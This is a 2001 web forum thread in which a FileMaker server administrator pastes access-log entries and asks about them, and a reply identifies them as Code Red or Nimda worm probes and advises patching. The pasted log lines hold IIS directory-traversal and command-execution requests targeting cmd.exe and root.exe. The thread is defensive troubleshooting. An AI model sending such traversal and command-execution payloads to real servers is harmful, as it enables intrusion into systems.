Jump to content
Claris Engage 2025 - March 25-26 Austin Texas ×

Yikes - Access Log?

Hammerton

By Hammerton
in Custom Web Publishing

 Share

This topic is 8373 days old. Please don't post here. Open a new topic instead.

Recommended Posts

Hammerton Collaborator

Hammerton

Posted
Posted

I recently started up a new FM5 Unlimited server set-up. Over the weekend I got an enormous number of requests, all of the sort that I have pasted below. The sites that I serve are academic and should not be getting any hits. Are these robots? Hacks? Or is this what a typical visit looks like on the access log. I previously used FM4.1 and it either didn't have this feature or I was too stupid to use it. I have limited IP access to my subnet so I don't think any damage was done in any event.

203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372

203.73.193.54 - - [15/Dec/2001:07:52:16 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1368

203.73.193.54 - - [15/Dec/2001:07:52:18 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

203.73.193.54 - - [15/Dec/2001:07:52:32 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:52:37 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:54:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

203.73.193.54 - - [15/Dec/2001:07:54:14 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

MpWiedemann Contributor

MpWiedemann

Posted
Posted

Those hits are from an internet worm. Either "Code Red" or "Nimda". If you are running IIS, make sure you have installed all the Microsoft Code Red patches. The hits are comming from other unpatched and infected IIS servers. Other than installing the patches there is not much you can do to prevent this.

Good luck,

Martin

Hammerton Collaborator

Hammerton

Posted
  • Author
Posted

Thanks Martin. I am running webstar on an old mac, and connecting to FM5U thru the FMWSC. Does any of that afford me protection? How do other folks deal with this? I read some posts about blocking access to those IPs but that seems futile given the volume.

Hammerton Collaborator

Hammerton

Posted
  • Author
Posted

Dwal - Thanks. IPNetSentry is great! see my post titled Cool Security Solution

This topic is 8373 days old. Please don't post here. Open a new topic instead.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.

  I accept